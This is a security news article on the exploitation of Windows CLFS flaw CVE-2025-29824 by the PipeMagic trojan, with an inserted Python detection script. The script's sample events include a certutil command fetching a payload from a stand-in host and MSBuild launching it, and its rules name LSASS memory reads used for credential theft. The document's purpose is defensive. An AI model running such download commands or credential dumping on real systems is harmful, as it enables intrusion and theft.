In April 2025, Microsoft disclosed a critical security flaw within the Windows Common Log File System (CLFS), identified as CVE-2025-29824. This privilege escalation vulnerability was actively exploited in targeted ransomware attacks across various sectors, including information technology, real estate, finance, software development, and retail.
The exploitation campaign, tracked by Microsoft under the codename Storm-2460, involved the deployment of a sophisticated malware known as PipeMagic. This plugin-based trojan has been in circulation since 2022 and has been previously associated with other zero-day exploits, notably CVE-2025-24983 and CVE-2023-28252.
Attack Methodology:
The exact initial access vector utilized by the attackers remains undetermined. However, observed tactics include the use of the certutil utility to download malicious payloads from compromised legitimate websites. These payloads often take the form of malicious MSBuild files containing encrypted data, which, upon execution, unpack and launch the PipeMagic trojan.
Once activated, PipeMagic exploits the CLFS vulnerability to escalate privileges to SYSTEM level. This escalation enables the malware to perform a series of malicious activities:
– Credential Dumping: The malware extracts user credentials by accessing the memory of the Local Security Authority Subsystem Service (LSASS).
– Ransomware Deployment: Following credential extraction, the malware encrypts files on the compromised system, appending a random extension to the affected files.
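The observable chain described above (certutil used as a downloader, MSBuild launching a file dropped in a user-writable path, then a non-system process reading LSASS memory) can be turned into simple host-telemetry detections. The following is an added example, not code from the original article or from Microsoft; it assumes a simplified Sysmon-style event shape (EventID 1 process creation, EventID 10 process access) and a small constructed allowlist of processes expected to read LSASS, both of which are assumptions to tune for a real estate.

```python
import re

# Constructed Sysmon-style events (id 1 = process create, id 10 = process access).
# These records were written for this example; they are not real telemetry.
SAMPLE_EVENTS = [
    {"id": 1, "image": r"C:\Windows\System32\certutil.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"certutil.exe -urlcache -split -f https://compromised.example/p.txt C:\Users\Public\p.txt"},
    {"id": 1, "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "parent": r"C:\Windows\System32\cmd.exe", "cmdline": r"MSBuild.exe C:\Users\Public\p.txt"},
    {"id": 10, "source_image": r"C:\Users\Public\svc.exe",
     "target_image": r"C:\Windows\System32\lsass.exe", "granted_access": "0x1010"},
    {"id": 1, "image": r"C:\Windows\System32\certutil.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"certutil.exe -hashfile C:\tools\setup.exe SHA256"},  # benign use, must not fire
    {"id": 10, "source_image": r"C:\Windows\System32\csrss.exe",
     "target_image": r"C:\Windows\System32\lsass.exe", "granted_access": "0x1010"},  # allowlisted reader
]

URL_RE = re.compile(r"https?://", re.IGNORECASE)
# Directories a standard user can write to; matched against the lower-cased command line.
USER_WRITABLE = ("\\users\\public\\", "\\appdata\\local\\temp\\", "\\windows\\temp\\", "\\programdata\\")
PROCESS_VM_READ = 0x0010  # access-mask bit needed to read another process's memory
LSASS_READERS_ALLOWED = {"csrss.exe", "wininit.exe", "msmpeng.exe"}  # assumed allowlist, tune per estate

def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def detect(events):
    """Return (rule_name, event_index) pairs for events matching the observed attack chain."""
    hits = []
    for i, ev in enumerate(events):
        if ev["id"] == 1:
            name, cmd = _basename(ev["image"]), ev["cmdline"].lower()
            # certutil used as a downloader: a cache/verify switch combined with a URL argument
            if name == "certutil.exe" and ("-urlcache" in cmd or "-verifyctl" in cmd) and URL_RE.search(cmd):
                hits.append(("certutil_download", i))
            # MSBuild asked to build a "project" that lives in a user-writable location
            if name == "msbuild.exe" and any(d in cmd for d in USER_WRITABLE):
                hits.append(("msbuild_user_writable_project", i))
        elif ev["id"] == 10 and _basename(ev["target_image"]) == "lsass.exe":
            mask = int(ev["granted_access"], 16)
            # memory-read access to LSASS from a process outside the allowlist (credential dumping)
            if mask & PROCESS_VM_READ and _basename(ev["source_image"]) not in LSASS_READERS_ALLOWED:
                hits.append(("lsass_memory_read", i))
    return hits
```

Running `detect(SAMPLE_EVENTS)` flags the first three events and leaves the benign certutil hashing and the allowlisted csrss.exe access alone; in practice the three rule names would be correlated on the same host and time window rather than alerted on individually.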
Although Microsoft was unable to obtain a sample of the ransomware for detailed analysis, the ransom notes left on encrypted systems contained links to a TOR domain associated with the RansomEXX ransomware family.
Technical Details:
The CLFS vulnerability exploited in these attacks is a memory corruption flaw in the CLFS kernel driver. Building on this corruption, the exploit uses the RtlSetAllBits API to overwrite the exploit process's token with the value 0xFFFFFFFF, which grants the process every available privilege and enables further actions such as injecting code into SYSTEM processes.
Windows 11, version 24H2, is not affected by this particular exploit chain: in that version, access to certain System Information Classes within NtQuerySystemInformation is restricted to users holding SeDebugPrivilege, which is normally limited to administrative users.
Historical Context:
The PipeMagic trojan has a history of exploiting zero-day vulnerabilities within the Windows operating system. In March 2025, ESET researchers identified that PipeMagic was used to exploit CVE-2025-24983, a use-after-free vulnerability in the Windows Win32 Kernel Subsystem. This flaw allowed attackers to escalate privileges to SYSTEM level on older Windows versions, including Windows 8.1 and Server 2012 R2. The exploit had been active since March 2023, highlighting the persistent threat posed by such vulnerabilities.
Additionally, in April 2023, Kaspersky reported that PipeMagic was linked to Nokoyawa ransomware attacks exploiting another CLFS zero-day vulnerability, CVE-2023-28252. This pattern underscores the trojan’s adaptability and the critical need for timely patching of known vulnerabilities.
Mitigation and Recommendations:
Microsoft has addressed the CVE-2025-29824 vulnerability in its April 2025 Patch Tuesday update. Organizations are strongly advised to apply this update promptly to mitigate the risk of exploitation.
To further protect against such threats, organizations should:
– Regularly Update Systems: Ensure that all systems are up-to-date with the latest security patches and updates.
– Implement Least Privilege Access: Restrict user permissions to the minimum necessary for their roles to limit the potential impact of a compromised account.
– Monitor Network Activity: Utilize intrusion detection and prevention systems to monitor for unusual network activity that may indicate a compromise.
– Educate Employees: Conduct regular cybersecurity training to raise awareness about phishing attacks and the importance of not downloading or executing unverified files.
By adopting these measures, organizations can enhance their resilience against sophisticated malware campaigns like those involving the PipeMagic trojan.